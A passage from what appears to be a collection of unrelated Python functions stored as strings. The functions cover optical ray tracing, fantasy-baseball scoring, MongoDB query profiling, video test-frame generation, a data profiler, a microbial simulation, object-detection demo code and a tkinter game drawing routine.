Transmitted\n pass\n else:\n # Loss\n self.active = False\n return self\n \n # Fresnel details\n normal = intersection_object.shape.surface_normal(self.ray)\n rads = angle(normal, self.direction)\n \n # material-air or material-material interface\n # Are there duplicates intersection_points that are equal to the ray position?\n same_pt_indices = []\n for i in range(0,len(intersection_points)):\n if cmp_points(self.position, intersection_points[i]):\n same_pt_indices.append(i)\n assert len(same_pt_indices) < 3, \"An interface can only have 2 or 0 common intersection points.\"\n \n initialised_internally = None\n \n if len(same_pt_indices) == 2:\n intersection_object = self.container\n \n if self.container == intersection_object:\n \n # hitting internal interface -- for the case we are at an material-material interface (i.e. 
not travelling through air)\n initialised_internally = True\n \n if len(same_pt_indices) == 2:\n \n for obj in intersection_objects:\n if obj.shape.on_surface(intersection) and obj != self.container:\n #if obj != self.container:\n next_containing_object = obj\n \n \n else:\n # hitting internal interface -- for the case we are not at an interface\n next_containing_object = self.scene.container(self)\n \n assert self.container != next_containing_object, \"The current container cannot also be the next containing object after the ray is propagated.\"\n \n # Fresnel details\n normal = intersection_object.shape.surface_normal(self.ray)\n rads = angle(normal, self.direction)\n if self.polarisation == None:\n reflection = fresnel_reflection(rads, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n else:\n reflection = fresnel_reflection_with_polarisation(normal, self.direction, self.polarisation, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n \n else:\n # hitting external interface\n initialised_internally = False \n \n \n if len(same_pt_indices) == 2:\n for obj in intersection_objects:\n if obj != self.container:\n intersection_object = obj\n next_containing_object = obj\n else:\n next_containing_object = intersection_object\n \n #import pdb; pdb.set_trace()\n normal = intersection_object.shape.surface_normal(self.ray)\n rads = angle(normal, self.direction)\n if self.polarisation == None:\n reflection = fresnel_reflection(rads, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n else:\n reflection = fresnel_reflection_with_polarisation(normal, self.direction, self.polarisation, self.container.material.refractive_index, next_containing_object.material.refractive_index)\n \n if isinstance(next_containing_object, Collector):\n # If the photon hits an interface with e.g. a cell index-matched to it, then no reflection is to occur at this interface.\n reflection = 0.\n \n if np.random.random_sample() < reflection:\n # photon is reflected\n before = copy(self.direction)\n self.direction = reflect_vector(normal, self.direction)\n ang = angle(before, self.direction)\n \n if self.polarisation != None:\n \n #import pdb; pdb.set_trace()\n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n \n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. #1: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(np.degrees(angle(self.direction, self.polarisation)))\n \n self.propagate = False\n self.exit_device = self.container\n \n # invert polaristaion if n1 < n2\n if self.container.material.refractive_index < next_containing_object.material.refractive_index:\n \n if self.polarisation != None:\n \n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation * -1.\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n \n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. 
#2: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(angle(self.direction, self.polarisation))\n \n if self.exit_device == self.scene.bounds or self.exit_device == None:\n self.exit_device = intersection_object\n assert self.exit_device != self.scene.bounds, \"The object the ray hit before hitting the bounds is the bounds, this can't be right\"\n return self\n else:\n # photon is refracted through interface\n self.propagate = True\n before = copy(self.direction)\n ang = angle(before, self.direction)\n if initialised_internally:\n if not isinstance(next_containing_object, Collector):\n self.direction = fresnel_refraction(normal, self.direction, self.container.material.refractive_index, next_containing_object.material.refractive_index )\n \n if self.polarisation != None:\n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. #3: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(angle(self.direction, self.polarisation))\n \n self.exit_device = self.container #LSC is the exit_device\n self.previous_container = self.container\n self.container = next_containing_object #Bounds is the container\n return self\n else:\n if not isinstance(next_containing_object, Collector):\n self.direction = fresnel_refraction(normal, self.direction, self.container.material.refractive_index, intersection_object.material.refractive_index )\n \n if self.polarisation != None:\n \n if cmp_floats(ang, np.pi):\n # Anti-parallel\n self.polarisation = self.polarisation\n else:\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n R = rotation_matrix_from_vector_alignment(before, self.direction)\n self.polarisation = transform_direction(self.polarisation, R)\n # apply the rotation transformation the photon polarisation which aligns the before and after directions\n\n assert cmp_floats(angle(self.direction, self.polarisation), np.pi/2), \"Exit Pt. 
#4: Angle between photon direction and polarisation must be 90 degrees: theta=%s\" % str(angle(self.direction, self.polarisation))\n                \n                # DJF 13.5.2010: This was crashing the statistical collection because it meant that an incident ray, hitting and transmitted, then lost would have bounds as the exit_device.\n                #self.exit_device = self.container\n                self.exit_device = intersection_object\n                self.previous_container = self.container\n                self.container = intersection_object\n                return self", "def sumPoints(popSize, population, x):\n    skipCount = 0\n    for num in range(popSize):\n        passParam = 0\n        # print \"pre-skip check; skip count is: \", skipCount\n        if skipCount != 0:\n            skipCount -= 1\n            # print \"skip detected\"\n            continue\n        if num > 0:  # done this way because: if num = 0 population[num-1] will fail\n            if x == \"avg\":  # each category evaluates a different attribute of the team\n                if population[num - 1].totAvg == population[num].totAvg:\n                    count, sentinel = 1, 1  # count is 1 because 1 data at that value has been detected already\n                    while sentinel == 1:\n                        if num + count <= popSize - 1:\n                            if population[num + count - 1].totAvg == population[num + count].totAvg:\n                                count += 1\n                            else:\n                                sentinel = 0\n                        else:\n                            sentinel = 0\n                    for i in range(\n                            count):  # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n                        population[num + i].points += popSize - num + 1\n                        # print \"points changed!\"\n                        # print num+i, population[num+i].points\n                    skipCount += count - 1\n                    # print \"num\",num\n                    passParam = 1\n            elif x == \"sb\":  # each category evaluates a different attribute of the team\n                if population[num - 1].totSb == population[num].totSb:\n                    count, sentinel = 1, 1  # count is 1 because 1 data at that value has been detected already\n                    while sentinel == 1:\n                        if num + count <= popSize - 1:\n                            if population[num + count - 1].totSb == population[num + count].totSb:\n                                count += 1\n                            else:\n                                sentinel = 0\n                        else:\n                            sentinel = 0\n                    for i in range(\n                            count):  # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n                        population[num + i].points += popSize - num + 1\n                        # print \"points changed!\"\n                        # print num+i, population[num+i].points\n                    skipCount += count - 1\n                    # print \"num\",num\n                    passParam = 1\n            elif x == \"hr\":\n                if population[num - 1].totHr == population[num].totHr:\n                    count, sentinel = 1, 1  # count is 1 because 1 data at that value has been detected already\n                    while sentinel == 1:\n                        if num + count <= popSize - 1:\n                            if population[num + count - 1].totHr == population[num + count].totHr:\n                                count += 1\n                            else:\n                                sentinel = 0\n                        else:\n                            sentinel = 0\n                    for i in range(\n                            count):  # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n                        population[num + i].points += popSize - num + 1\n                        # print \"points changed!\"\n                        # print num+i, population[num+i].points\n                    skipCount += count - 1\n                    # print \"num\",num\n                    passParam = 1\n            elif x == \"rbi\":\n                if population[num - 1].totRbi == population[num].totRbi:\n                    count, sentinel = 1, 1  # count is 1 because 1 data at that value has been detected already\n                    while sentinel == 1:\n                        if num + count <= popSize - 1:\n                            if population[num + count - 1].totRbi == population[num + count].totRbi:\n                                count += 1\n                            else:\n                                sentinel = 0\n                        else:\n                            sentinel = 0\n                    for i in range(\n                            count):  # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n                        
population[num + i].points += popSize - num + 1\n                        # print \"points changed!\"\n                        # print num+i, population[num+i].points\n                    skipCount += count - 1\n                    # print \"num\",num\n                    passParam = 1\n            elif x == \"runs\":\n                if population[num - 1].totRuns == population[num].totRuns:\n                    count, sentinel = 1, 1  # count is 1 because 1 data at that value has been detected already\n                    while sentinel == 1:\n                        if num + count <= popSize - 1:\n                            if population[num + count - 1].totRuns == population[num + count].totRuns:\n                                count += 1\n                            else:\n                                sentinel = 0\n                        else:\n                            sentinel = 0\n                    for i in range(\n                            count):  # for every n number of duplicates, this action is performed n-1 times since duplicates are treated when the second one is detected\n                        population[num + i].points += popSize - num + 1\n                        # print \"points changed!\"\n                        # print num+i, population[num+i].points\n                    skipCount += count - 1\n                    # print \"num\",num\n                    passParam = 1\n            if passParam == 0:  # will only be 0 if no repeats are detected; alternative to putting an else statement in each category if clause\n                population[num].points += popSize - num  # in which case: business as usual\n                # print \"more points yo\"\n        else:\n            population[num].points += popSize - num  # business as usual\n            # print \"getting them points\"\n        # print num, population[num].points", "def should_profile():\n    if util.dev_server:\n        return _config.should_profile_development()\n    else:\n        return _config.should_profile_production()", "def __post_init__(self) -> None:\n        self.annotate = self.x_y[0] == 0 or self.x_y[1] == 0", "def double_profile(tprofile_x, tprofile_y):\n    ## Note: underflow and overflow bins are discarded\n\n    if len(tprofile_x) != len(tprofile_y):\n        raise ValueError(\"Cannot build double profile: x and y profiles \"\n                         \"have different number of bins ({} and {})\".format(\n                            len(tprofile_x)-2, len(tprofile_y)-2))\n\n    _dp_graph = Graph(len(tprofile_x)-2, type='errors')  # symmetric errors\n\n    _i_point = 0\n    for _i_bin, (_bin_proxy_x, _bin_proxy_y) in enumerate(zip(tprofile_x, tprofile_y)):\n        # disregard overflow/underflow bins\n        if _i_bin == 0 or _i_bin == len(tprofile_x) - 1:\n            continue\n\n        if _bin_proxy_y.value:\n            _dp_graph.SetPoint(_i_point, _bin_proxy_x.value, _bin_proxy_y.value)\n            _dp_graph.SetPointError(_i_point, _bin_proxy_x.error, _bin_proxy_y.error)\n            _i_point += 1\n\n    # remove \"unfilled\" points\n    while (_dp_graph.GetN() > _i_point):\n        _dp_graph.RemovePoint(_dp_graph.GetN()-1)\n\n    return _dp_graph", "def make_lineprofile(npix,rstar,xc,vgrid,A,veq,linewidth):\n    vc=(np.arange(npix)-xc)/rstar*veq\n    vs=vgrid[np.newaxis,:]-vc[:,np.newaxis]\n    profile=1.-A*np.exp( -(vs*vs)/2./linewidth**2)\n    return profile", "def genFrameImages((widthPixels, heightPixels), flashColourGen, flashColourGenPipTrain, numFrames, FPS, superSamplingScale=8, BG_COLOUR=(0,0,0), TEXT_COLOUR=(255,255,255), GFX_COLOUR=(255,255,255), title=\"\", TITLE_COLOUR=(255,255,255), FRAMES_AS_FIELDS=False, frameSkipChecker=None, segments=[]):\n\n    # we're going to draw a larger (super sampled) image and then scale it down\n    # to get smoothing (compensating for the lack of anti-aliased drawing functions\n    # in PIL)\n\n    width = widthPixels * superSamplingScale\n    height = heightPixels * superSamplingScale\n\n    flashCols = list(flashColourGen)[0:numFrames]\n    flashColsPipTrain = list(flashColourGenPipTrain)[0:numFrames]\n\n    # we'll pretend we're working within a rectangle (0,0) - (160,90)\n    # and use a scaling function to map to our actual dimensions\n    scaler = AspectPreservingCoordinateScaler((160,90),(width,height))\n\n    # load a font for text\n    font = 
loadFont(sizePt = scaler.s(4))\n smallfont = loadFont(sizePt = scaler.s(4))\n \n # work out the segment description text, then check its size and adjust the fontsize to ensure it fits within bounding area\n if segments:\n segment_description_text = \"\\n\".join(map(lambda seg : seg[\"description\"], segments))\n tmpimg = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n tmpdraw = ImageDraw.Draw(tmpimg)\n w,h = tmpdraw.multiline_textsize(segment_description_text, font=smallfont)\n max_w, max_h = scaler.xy((140,13))\n \n shrink_factor = min(float(max_w) / w, float(max_h) / h, 1)\n smallfont = loadFont(sizePt = scaler.s(4*shrink_factor))\n \n poy = 0 # pie Y offset\n dfy = 65 # duration and FPS labels Y offset\n if segments:\n poy = -10\n dfy = 19\n\n\n\n WHITE=(255,255,255)\n BLACK=(0,0,0)\n\n if FRAMES_AS_FIELDS:\n imageName = \"field\"\n labelFps = FPS / 2\n else:\n imageName = \"frame\"\n labelFps = FPS\n\n\n for frameNum in range(0,numFrames):\n if frameSkipChecker is not None:\n shouldSkip=frameSkipChecker(frameNum)\n if shouldSkip:\n yield None\n continue\n\n timecode = frameNumToTimecode(frameNum, FPS, framesAreFields=FRAMES_AS_FIELDS)\n timeSecs = float(frameNum) / FPS\n nextTimeSecs = float(frameNum+1) / FPS # time of next frame after this\n durationTimecode = frameNumToTimecode(numFrames, FPS)\n\n # create black image and an object to let us draw on it\n img = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n draw = ImageDraw.Draw(img)\n\n # draw a flashing rectangular box on the left side\n flashColour = flashCols[frameNum]\n topLeft = scaler.xy((10, 30))\n bottomRight = scaler.xy((40, 60))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=GFX_COLOUR)\n topLeft = scaler.xy((11, 31))\n bottomRight = scaler.xy((39, 59))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=flashColour)\n\n # draw text label explaining to attach light sensor to the flashing box\n topLeft = scaler.xy((41, 37))\n draw.text(topLeft, \"Use light detector\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 41))\n draw.text(topLeft, \"on centre of\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 45))\n draw.text(topLeft, \"this box\", font=font, fill=TEXT_COLOUR)\n\n # draw text labels giving frame number, timecode and seconds covered by this frame\n topLeft = scaler.xy((10, 4))\n draw.text(topLeft, timecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 9))\n draw.text(topLeft, \"%06d of %d %ss\" % (frameNum, numFrames, imageName), font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 14))\n draw.text(topLeft, u\"%08.3f \\u2264 t < %08.3f secs\" % (timeSecs, nextTimeSecs), font=font, fill=TEXT_COLOUR)\n\n topLeft = scaler.xy((10,dfy))\n draw.text(topLeft, \"Duration: \" + durationTimecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10,dfy+5))\n draw.text(topLeft, \"%d fps\" % labelFps, font=font, fill=TEXT_COLOUR)\n\n # and more text labels, but this time right justified\n text = title\n w,h = font.getsize(text)\n topLeft = scaler.xy((150,4))\n topLeft = topLeft[0] - w, topLeft[1]\n draw.text(topLeft, text, font=font, fill=TITLE_COLOUR)\n\n # draw an outer ring segment indicating the time period covered by the current frame\n topLeft = scaler.xy((105, 20+poy))\n bottomRight = scaler.xy((155, 70+poy))\n angle1 = 360 * (frameNum % FPS) / FPS\n angle2 = 360 * ((frameNum % FPS) + 1) / FPS\n draw.pieslice(topLeft + bottomRight, start=270+angle1, end=270+angle2, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n 
topLeft = scaler.xy((108, 23+poy))\n bottomRight = scaler.xy((152, 67+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n\n\n # draw frame num ring\n topLeft = scaler.xy((110, 25+poy))\n bottomRight = scaler.xy((150, 65+poy))\n angle = 360 * (frameNum % FPS) / FPS\n if (frameNum / FPS) % 2 == 0: # if this is an even second (0-0.9, 2-2.9, 4-4.9 etc)\n draw.pieslice(topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n else:\n draw.pieslice(topLeft + bottomRight, start=270+angle, end=270+360, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((113, 28+poy))\n bottomRight = scaler.xy((147, 62+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n \n # draw outer for segments\n if segments:\n topLeft = scaler.xy((115-0.25, 30+poy-0.25))\n bottomRight = scaler.xy((145+0.25, 60+poy+0.25))\n draw.ellipse(topLeft + bottomRight, fill=WHITE, outline=None)\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n draw.ellipse(topLeft + bottomRight, fill=BLACK, outline=None)\n\n # draw progress pie\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n angle = 360.0*frameNum/numFrames\n precise_filled_pieslice(draw, topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n\n # draw segments over the pieslice\n if segments:\n for i in range(0, len(segments)):\n angle = math.radians(270 + 360.0*segments[i][\"startSecs\"]/numFrames*FPS)\n centre = scaler.xy((130,45+poy))\n armEnd = scaler.xy((130 + 15*math.cos(angle), 45+poy + 15*math.sin(angle)))\n draw.line([centre, armEnd], fill=WHITE, width=int(scaler.s(0.25)))\n \n segStartFrame = segments[i][\"startSecs\"] * FPS\n nextStartFrame = segments[(i+1) % len(segments)][\"startSecs\"] * FPS\n if nextStartFrame <= segStartFrame:\n nextStartFrame += numFrames\n midAngle = math.radians(270 + 360.0* (segStartFrame+nextStartFrame)/2/numFrames)\n w,h = font.getsize(segments[i][\"label\"])\n centre = scaler.xy((130 + 15*math.cos(midAngle)*0.7, 45+poy + 15*math.sin(midAngle)*0.7))\n topLeft = centre[0] - w/2, centre[1] - h/2\n draw.text(topLeft, segments[i][\"label\"], fill=WHITE, font=font)\n\n # draw segment long labels\n topLeft = scaler.xy((10,61))\n draw.multiline_text(topLeft, segment_description_text, fill=WHITE, font=smallfont)\n \n # draw pulse train at the bottom\n LIM=FPS\n NUM_BLOBS = 2*LIM + 1\n blobSpacing = 150.0/NUM_BLOBS\n\n for offset in range(-LIM, +LIM+1):\n left = 80+blobSpacing*(offset-0.5)\n right = 80+blobSpacing*(offset+0.5)\n\n topLeft = scaler.xy(( left, 80 ))\n bottomRight = scaler.xy(( right, 85 ))\n\n seqIndex = offset + frameNum\n if seqIndex >= 0 and seqIndex < numFrames:\n colour = flashColsPipTrain[seqIndex]\n draw.rectangle(topLeft + bottomRight, outline=None, fill = colour)\n\n if offset == 0:\n # draw blob above\n topLeft = scaler.xy(( left, 75 ))\n bottomRight = scaler.xy(( right, 80 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # and below\n topLeft = scaler.xy(( left, 85 ))\n bottomRight = scaler.xy(( right, 90 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # shrink the image using high quality downsampling\n try:\n scalingMode = Image.LANCZOS\n except AttributeError:\n scalingMode = Image.BICUBIC\n\n rescaledImage = img.resize((widthPixels,heightPixels), scalingMode)\n\n yield rescaledImage", "def pruneBaselines(self, aru_prediction, size=()):\n if 
self.prune_method == 'simple':\n bl = aru_prediction[0,:,:,0] \n other = aru_prediction[0,:,:,2] \n # binarization\n b = 0.4\n # take both classes into account\n out = np.where(np.logical_and(bl > b, other < b), 1.0, 0)\n # remove some holes and single items\n # important step, otherwise the skeleton will have many small\n # branches\n # TODO: exchange w. opencv counterpart (faster)\n selem = np.ones((1,3))\n out = np.where(binary_closing(out,selem=selem),1.0,0.0)\n out = np.where(binary_opening(out,selem=selem),1.0,0.0)\n# misc.imsave(os.path.join(self.outdir,'tmp.png'), out)\n\n # enlarge output again\n # out = misc.imresize(out, size, interp='nearest') \n # deprecated, use:\n out = np.array(Image.fromarray(out).resize(size,\n resample=Image.NEAREST))\n # TODO: replace w. opencv cv2.resize\n\n # now let's get only single pixel lines\n# misc.imsave(os.path.join(self.outdir,'tmp2.png'), out)\n out = skeletonize(out) \n else:\n print('not implemented yet')\n\n return out", "def watch_profile(self):\r\n profile_parser = ProfileParser()\r\n databases = self._get_requested_databases()\r\n connection = pymongo.MongoClient(self._db_uri,\r\n document_class=OrderedDict,\r\n read_preference=pymongo.ReadPreference.PRIMARY_PREFERRED)\r\n enabled_profile = False\r\n\r\n if databases == []:\r\n try:\r\n databases = connection.database_names()\r\n except:\r\n message = \"Error: Could not list databases on server. Please \" \\\r\n + \"check the auth components of your URI.\\n\"\r\n sys.stderr.write(message)\r\n databases = []\r\n\r\n for ignore_db in IGNORE_DBS:\r\n if ignore_db in databases:\r\n databases.remove(ignore_db)\r\n\r\n if len(databases) != 1:\r\n message = \"Error: Please use namespaces (-n) to specify a single \" \\\r\n + \"database for profile watching.\\n\"\r\n sys.stderr.write(message)\r\n return 1\r\n\r\n database = databases[0]\r\n db = connection[database]\r\n\r\n initial_profile_level = db.profiling_level()\r\n\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Profile level currently 0. Dex is setting profile \" \\\r\n + \"level 1. To run --watch at profile level 2, \" \\\r\n + \"enable profile level 2 before running Dex.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(DEFAULT_PROFILE_LEVEL)\r\n\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n try:\r\n for profile_entry in self._tail_profile(db, WATCH_INTERVAL_SECONDS):\r\n self._process_query(profile_entry,\r\n profile_parser)\r\n if time.time() >= output_time:\r\n self._output_aggregated_report(sys.stderr)\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n except KeyboardInterrupt:\r\n sys.stderr.write(\"Interrupt received\\n\")\r\n finally:\r\n self._output_aggregated_report(sys.stdout)\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Dex is resetting profile level to initial value \" \\\r\n + \"of 0. 
You may wish to drop the system.profile \" \\\r\n + \"collection.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(initial_profile_level)\r\n\r\n return 0", "def _verify_profile(self, account_id: str, profile_id: str) -> str:\n profile = self.__ingest_profile\n if profile_id and self.__ip.ProfileExists(account_id=account_id, profile_id=profile_id):\n profile = profile_id\n elif self.__ingest_profile=='':\n response = self.__ip.GetDefaultProfile(account_id=account_id)\n if response.status_code in DynamicIngest.success_responses:\n profile = response.json().get('default_profile_id')\n return profile", "def __add__(self, other):\n if type(other) is not type(self):\n raise TypeError('`{}` and `{}` are not of the same profiler type.'.\n format(type(self).__name__, type(other).__name__))\n elif self.name != other.name:\n raise ValueError('Structured profile names are unmatched: {} != {}'\n .format(self.name, other.name))\n elif set(self.profiles) != set(other.profiles): # options check\n raise ValueError('Structured profilers were not setup with the same'\n ' options, hence they do not calculate the same '\n 'profiles and cannot be added together.')\n merged_profile = StructuredColProfiler(\n df_series=pd.Series([]),\n min_sample_size=max(self._min_sample_size, other._min_sample_size),\n sampling_ratio=max(self._sampling_ratio, other._sampling_ratio),\n min_true_samples=max(self._min_true_samples,\n other._min_true_samples),\n options=self.options,\n )\n\n merged_profile.name = self.name\n merged_profile._update_base_stats(\n {\"sample\": self.sample,\n \"sample_size\": self.sample_size,\n \"null_count\": self.null_count,\n \"null_types\": copy.deepcopy(self.null_types_index),\n \"min_id\": self._min_id,\n \"max_id\": self._max_id}\n )\n merged_profile._update_base_stats(\n {\"sample\": other.sample,\n \"sample_size\": other.sample_size,\n \"null_count\": other.null_count,\n \"null_types\": copy.deepcopy(other.null_types_index),\n \"min_id\": other._min_id,\n \"max_id\": other._max_id}\n )\n samples = list(dict.fromkeys(self.sample + other.sample))\n merged_profile.sample = random.sample(samples, min(len(samples), 5))\n for profile_name in self.profiles:\n merged_profile.profiles[profile_name] = (\n self.profiles[profile_name] + other.profiles[profile_name]\n )\n return merged_profile", "def Run_Profile(init,traits,Env,sig = 0.0001,Ntot0 = 10,tmax = 100,T=TS,dt = 0.01,mu=0.005):\n\n\t## Environmental conditions\n\tHinf = Env[0]\n\tCinf = Env[1]\n\tNinf = Env[2]\n\tGinf = Env[3]\n\tQH = Env[4]\n\tQC = Env[5]\n\tQN = Env[6]\n\tQG = Env[7]\n \n\t## Traits \n\tthresh = traits[7]\n\tslope = traits[8]\n\tgmax = traits[9]\n\tVc = traits[1]\n\tQc = traits[2]\n\n\t## Calculation of constants over timescale of interest (here, the temperature is constant)\n\tDeltaG0catT = DeltaG0(T,deltaG0Cat,deltaH0Cat)\n\tDeltaG0anaT = DeltaG0(T,deltaG0Ana,deltaH0Ana)\n \n\t## Initialization\n\tHT = []\n\tCT = []\n\tNT = []\n\tGT = []\n\tXoT = []\n\tNCT = []\n\tXT = []\n\tD = []\n\ttime = []\n\tNPPT = []\n\tt=1\n\n\tHT.append(init[0])\n\tCT.append(init[1])\n\tNT.append(init[2])\n\tGT.append(init[3])\n\tXoT.append(init[4])\n\tNCT.append(init[5])\n\tXT.append(init[6])\n\tD.append(0)\n\ttime.append(0)\n\tt=1\n \n\twhile time[t-1] < tmax: \n\t\tH = HT[t-1]\n\t\tC = CT[t-1]\n\t\tN = NT[t-1]\n\t\tG = GT[t-1]\n\t\tXo = XoT[t-1]\n\t\tNC = NCT[t-1]\n\t\tX0 = XT[t-1]\n\n\t\tnNCT,nXT,qana,qcat,decay,mort,dt = 
Step_Profile(NC,X0,traits,[H,C,N,G],gamma,T,dt)\n\t\tNCT.append(nNCT)\n\t\tXT.append(nXT)\n\t\tD.append(decay+mort)\n\t\tnS = Step_Substrates([H,C,N,G],Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],qana,qcat,dt,Vc)\n\t\tHT.append(nS[0])\n\t\tCT.append(nS[1])\n\t\tNT.append(nS[2])\n\t\tGT.append(nS[3])\n\t\tNPPT.append(qana*NC)\n\n\t\tnXo = Step_DeadBiomass(Xo,Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],decay,mort,Qc,XT[t-1],dt,Vc)\n\t\tXoT.append(nXo)\n\t\ttime.append(time[t-1] + dt)\n\t\tt=t+1 \n#\t\tprint(time[t-1])\n\treturn(NCT,XT,HT,CT,NT,GT,XoT,D,time,NPPT)", "def demo(net, image_name,num_class,save_ff):\r\n\r\n # Load the demo image\r\n #im_file = os.path.join(cfg.DATA_DIR, 'demo', image_name)\r\n im_file=image_name\r\n im = cv2.imread(im_file)\r\n\r\n # Detect all object classes and regress object bounds\r\n timer = Timer()\r\n timer.tic()\r\n #for zzz in range(100):\r\n scores, boxes = im_detect(net, im)\r\n timer.toc()\r\n print ('Detection took {:.3f}s for '\r\n '{:d} object proposals').format(timer.total_time, boxes.shape[0])\r\n\r\n # Visualize detections for each class\r\n CONF_THRESH = 0.35\r\n NMS_THRESH = 0.3\r\n thresh=CONF_THRESH\r\n for cls_ind, cls in enumerate(range(num_class)):#CLASSES[1:]\r\n cls_ind += 1 # because we skipped background\r\n # cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]\r\n # cls_scores = scores[:, cls_ind]\r\n # dets = np.hstack((cls_boxes,\r\n # cls_scores[:, np.newaxis])).astype(np.float32)\r\n inds = np.where(scores[:, cls_ind] > thresh)[0]\r\n cls_scores = scores[inds, cls_ind]\r\n if cfg.TEST.AGNOSTIC:\r\n cls_boxes = boxes[inds, 4:8]\r\n else:\r\n cls_boxes = boxes[inds, cls_ind*4:(cls_ind+1)*4]\r\n dets = np.hstack((cls_boxes, cls_scores[:, np.newaxis])) \\\r\n .astype(np.float32, copy=False)\r\n keep = nms(dets, NMS_THRESH)\r\n dets = dets[keep, :]\r\n #vis_detections(im, cls, dets, thresh=CONF_THRESH)\r\n inds = np.where(dets[:, -1] >= thresh)[0]\r\n if len(inds) == 0:\r\n continue\r\n\r\n im_tmp = im#im[:, :, (2, 1, 0)]\r\n for i in inds:\r\n bbox = dets[i, :4]\r\n score = dets[i, -1]\r\n print bbox,score,cls\r\n cv2.rectangle(im_tmp, (bbox[0],bbox[1]), (bbox[2],bbox[3]), (0,0,255),2)\r\n #save_ff=\"/storage2/liushuai/faster_rcnn/FasterRCNN-Encapsulation-Cplusplus/faster_cxx_lib_ev2641/test_result.jpg\"\r\n im_tmp = im#im[:, :, (2, 1, 0)]\r\n cv2.imwrite(save_ff,im_tmp)\r\n #save_pic(im, cls, dets, thresh=CONF_THRESH,save_ff)\r", "def test_execution_profiling(self):\n self._test_reports_helper({\"--profile-execution\": \"\"}, [\"report.txt\"])", "def drawing_hit(self, shell, target):\n self.detonation = [(target.x - 3, target.y)]\n for i in range(7):\n self.x = target.x + 2 * i * target.r / 8 - target.r\n self.y = target.y - 2 * target.r\n self.xx = target.x - 3 + i\n self.yy = target.y\n self.detonation.extend(((self.x, self.y), (self.xx, self.yy)))\n\n self.canvas.create_polygon(self.detonation, outline=target.color, tag='text')\n\n self.canvas.create_arc(target.x - 1.5 * target.r, target.y - 2.5 * target.r,\n target.x, target.y + target.r / 3,\n start=160, extent=-80, style=tk.ARC, outline=target.color,\n width=2, tag='text')\n self.canvas.create_arc(target.x - target.r, target.y - 3 * target.r,\n target.x + target.r, target.y,\n start=140, extent=-100, style=tk.ARC, outline=target.color,\n width=2, tag='text')\n self.canvas.create_arc(target.x, target.y - 2.5 * target.r,\n target.x + 1.3 * target.r, target.y + target.r / 3,\n start=100, extent=-80, style=tk.ARC, outline=target.color,\n width=2, tag='text')\n\n if shell.flag_hit == True:\n 
